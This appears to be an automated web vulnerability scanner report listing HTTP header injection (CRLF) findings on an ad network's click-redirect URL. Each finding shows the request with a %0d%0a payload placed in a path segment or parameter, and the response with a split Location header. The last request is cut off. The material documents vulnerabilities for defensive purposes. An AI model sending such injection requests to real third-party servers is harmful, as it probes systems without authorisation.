GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/;ord=87fcc%0d%0a3c02d47cd03 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aNnEV8yg6GItMfn7Uid18imZblRZdy2ghyUePNZaOWMuZdghZbrMBmqAfa9ULFZd34OVn9qPvITVMDY1TN1KZdi152ZatGDVJQUuiG0q75fBKgnxtibNwBfNxucEqJUls2HQiZb1hhoSyueP2xAaRECOxlJhoJeQGCGjMx3Za2mRAqIhb9xNGIZccDGeCc0vSck4B746T0B3Aj8xVt4PoxlgeceiXNo2c2QnaBEaBatV7CGeZd6Y9tP06RY18v0SE56b4PZcuRZd6ogX7DlZcQ49KcPVJjZakQvhA2sOup7E428pZdZbymPv65VrKy7ZaR6N2DvUNO5OKWulw3y0TLXRbwYQF7XIPpO9xn8ZdkFuALcLeDUuZd3ZcO4RZa0psCLZdQ4sYDLwSpWRFuZdnH6MVhQrEvledAZa47UZcSVcC70vJc7ZbEMPZa1NpZcfFZbgn0Tfjpk9ZaegX3MMm8hbTaMnMchZaYgZdnZbZd9C5vmXZcPRS9ZasLes6jZdUEZbxxNwVILOqfed2nSPPHNnTRlZcIKWqUZaCyg5l6hYOiv7ZaFpj4cKfIZcTOZdXpxLGdw4br3TASgfo7DFbTWZdDkcIKO6CV7hASc8Zbf; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:16 GMT;
Content-Type: text/html
Location: ;ord=87fcc
3c02d47cd03
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6ee78%0d%0a4697cd0fdb4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/6ee78%0d%0a4697cd0fdb4/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aBnFNfqZbaO5AiPqlfEMlMp0CrY1VMO6DaxPZc430eDivvFS7bYquWjKWsEyoRZbWhm4HfJyiRUg8218umR6KSGZbrssC9JqkYBZdGOqnZcdQ0bEH1RhMnrgAKNi7tStn1Eif6oqrK4RyKOPIZb7ZdZdld13nshCO0ypObox47cS7CadNO90UFRodmYg6PngFQmVOtoM1iQn392T7ufNhJfBgk8jLZafDGZdjXGFZdqbGeifodxc4c9TN3dqjmX8om403hOexiHkOgZcuX0PqIlcbECDEs701oIAcYjgZbZbAEN57DSqiZb3EoC5PeNwQF2Ddol1qBtbupGhnZcjLIZcg2rUrgr9pbZdQp6n9Fj8tncJpOoZbWPEnoQQ1TZbbZbcET3pHEnKAvQF4UveyxpPj97FZbb2Qjr3KWywaY1gURpjk5Zc0JxWMQ3VO2ZdW4XlDQGZdskOAGK93seC7m2HVH5HZdUCnh3wciRxVCaKZaFS9dmHO6s5p6WTK5xqMSB5sqoaFoT5UR7NsMZbbF1IZa2GdQMkH1UZceTOgjkAQEG8j8CShPdRYsTUYlsV9kZcWZc5V822k7OnNUFkHFnQoTeAZbTF1ZcVVUW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:19 GMT;
Content-Type: text/html
Location: 6ee78
4697cd0fdb4/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload d2c58%0d%0a02f5864db6e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/d2c58%0d%0a02f5864db6e/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=atnEV8riInGR6X3QiibuL53ZbVlB0el4RlUwkZci3ZcAIUZdC33P7ZbpGnKKZcEmZdOJypcXsaT2vHiJnH42AwhE395E60KrSmW7ZcFMiPUlZclFeTc7ZcKJ5Ckbjr1dRQdwuuZcsNZb4uOkTmZdAmHREWwOXAbrZatxQ1IOpRPhfIFhphib1ZbJd6EsxlqqAN39mCZbaS4gMX4cZdZclZaaJSZcQj8eZd3VjjX5cZdIAl5NS27B773jmnAGcehm3vnt5XNrWmqId4vVBegXhRD8Xik0XXHNerDuAyWQxLY5PdBJIVwIguwXa8T3aYeZasvLWATZcb9xjqB07RZdneEvnGyZcvoncPJhaCU4MwMBOTZcWhs5xZdGXWIh4sA4bPbKInXuSy4H3I6xJZa4hlwt5I70JUXsiXlJn7WMFDTuTX1JK4batH5rBUGiamgVVRRmhlA1Za7YN8JhXhDCBAoCZa02Rtdhp3ZbVF2WWtBix4l1FZcU15CUMpLo1I5o39Zc2tpAP9oeBsYvjQJFUS8ZcDbPVajyk7NO4K6SZbRgqJZcOqQwZd3pnWNPmdmLrKCwVem1JQgrjRZbxlYbWul526HeGFOf2TF; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:34 GMT;
Content-Type: text/html
Location: http:/d2c58
02f5864db6e/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 61e23%0d%0a6f34d91a354 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/61e23%0d%0a6f34d91a354/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aJnEV8p26SJ6UVsB7hhiG532orIJPmn0mu0IIwPxudaiFuonqfaxFBWZc1oF7apUZd2ROwenyFZbhQickI4H9VOZcnHUt4Q8EETYooI9QdtQSt6Zdded031bEujy57y6fZcanZbhKXhqvm0Zdbjg9ou7wIsh3aZaHAEbUMZcP3f7oUb99UYk96sNh064CVrc4CF5hAquAIxEKM5HnfCt7K8G8sJVxc2HEsrulK8A2LrOhs50ZdIZbxb7buRRXrY1LhsN8YTH1e2S489hgVb2dZaCXHVuskTTeCRiIuHHNZbHtVN2AxvntkHHjciM2JTTxcSZajbl2bf42JUoui5msV2UnZcZaGH7nLwguWqqAZaKxFU68b8nLkfHhGXFx0ZcjltyVbOZbVTLnZaFgvUBdfDPn3cbYWVk3ZdZdTUZdkr62bNr0mEacAsd5eZatN4RhAZbyvxaDj7ZdSNhnIaL2ZacqeWWlnXlZcSQHhlALZcjBMjjug07y5tHd5dG3S1OOWcqPOGmnUMPyZcDJgUZbPcd3xtgHGrH2YkUrZdJKFXxJZb4TfYuR9CiXiLQXJZcfZaZceRfnZcwqe7TMp7HArHNxEAJtjI52P; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:50 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/61e23
6f34d91a354/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 79a61%0d%0a591604da318 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/79a61%0d%0a591604da318/B5094459.6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=apnEV8RkPcB8UKunbLZbZaKjmiR081qw6b2fnSZcsx8GmbHqGZbOGbtLWZa5OlhTrZaivTTj5qLwZc03vPXp8sPDZchHZbW3rwBeLnZbMRV6djGk64YcZbYkeRc4ZciUccTG5PugtAuxVxvNVZdB5tObAmt34xAcCvLMtwg6ZdoBKIyvcvO7rablhh8h9qRNh9fsOGt7woEWvZcUxgNf90APvoksN7NeZdVRBbvSYnEqIxh8JAb2gVaLmUoJZdnSK4pWuVeeErrvMtTIZcHZd9sSAx2PP77rwaP4tSye3o4Hxq9sD6BlErvfjffoSeYBg5BR1OjTuuyYWnex3HZb0dZcHCAnFYB8Ar9pAaIAHspA0YIAphZaB08xeDZbSe2FnsltZbQ8U97Xa3SNtqXWQb4LZaQiSb1arM902A3Jx4vVtSbbrwhsHmo2ZcyoHZbta41LnYx5kbZdBdkwO9oZb3ZbbOIIRFqaZdZd6ExZbybKoFLDsKeKWTeDVPZaYqvCCfJIZa2gtM0Q20pwIGtMHCAX8kW4EM7rxZbRTLHaZaLsZcsiFWj3j194mZbuwG2suuZdv3RjHdf5VdaSZaVUgrIKyOasFYjtBvFiC; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:03 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/79a61
591604da318/B5094459.6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload f1fb1%0d%0af39af8ac1d6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/f1fb1%0d%0af39af8ac1d6 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aQnEV8o0PaEAZb2t7YSZahO44KovZdgmYfHXbxCDgsowEBUT5AZaRlpIZc8RZbx9pry3hZdZdT3dhsJlETR1t5m6hiaruYsbtGc5yZbMDowkNN7g4y17kxyVQoledCtWEHpSf5ZdrN4lp3wsDZctFCS2k51LZag7vgtVR49ZcZdhjeiIfX9dntYoIM0eCHLML97Sr055vATRVfXCDOaT472iwZcGabIXvU76HmQZbGKTP1btntlyxwdIqbsh1W4Kk2nj86adB4uiOhDgNQ9COw1ePRaDjihA8lR13k2udXYRo6f9hIOeanavZcdZaL7pRoGQxkZbVrZcZb1VeLiLZa4NLT8ZasmAi6Dn4rmZagZdrDMhKTZdZcdcZaBLG7L4ZbBDZaKjc23gpWTTHZdgs4fWWpTvgSZcEFFQb8caMYMZdiELNkr0TSElTR5rGZbXxkiDIih80ItiwjdjEyXaZcwtGu5rpcZbXZbM8v3cZcjpOimmCRrQHAw4JarKKTExWT78ZaynOGyx1NYUi4QkkLtZbeaUig8qglymMEGsjUHP6nVwskArrL8L5GngZbJewV1UNMN1ZdDh9Zc1xfDm8nuUQ7AxkFGADJM17Bq; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:20 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/f1fb1
f39af8ac1d6
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 41ee6%0d%0a7a7a7915a85 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6?41ee6%0d%0a7a7a7915a85=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ajnEV8OleoZcRnjwsvHjIGMPZaN3BhIGN3bwRu67CAY0ERgiZaeu9X1aTIHQFaMBPOGP7bGQmIYMVBiqVnYXTg3XPuZcZbfyFnwFZdiXuKxV90XbF3glSR8B9Tw14acJ1KK4nZboMuZbY4bkKjgRbcjfYnNZc9vXh6iQnjGevYMwtD9MaMJ6YHP7a9KinZbJNfYfTErdYyPxhGHiYp6RMZa86Zd0yGMQmmuDroiPITDMnY8n6RiY1B2137WiCKmQX9kERvKeNZa97ogFO0hR1lMct4JbOP3DftY0ZaihXd0nltKaArfTj6unsJlwZbnxydLU7D5VbGSaerQZchZdhtuvbvZa8mMXsI7IGV4dJMbGDaL6Iv0N1MIrwIhSZclZdvbAOsXe7kKcqkE9Oj6EwpAcqaEE34VFcB5EsbpDJnhqOyntYTVccBuDmEk5Zbt10eJiwJjJgXnuqZb58FQ77aB3psUkZabC22YAQOM4xZb7ZbiO7kLk7BBf8nNdOtDRxUmRQZdbdAZbGDAi3cEC6MDrQIAI4eTTH1ZdZcuKdJwlllRPJmg0y0O1OEQT4xN8IDgZdbqFyKM5d9NFQpQSgZcWOtE; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:43 GMT;
Content-Type: text/html
Location: http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6?41ee6
7a7a7915a85=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The value of the sz request parameter is copied into the Location response header. The payload 8d999%0d%0a5c8d14598ac was submitted in the sz parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=8d999%0d%0a5c8d14598ac HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
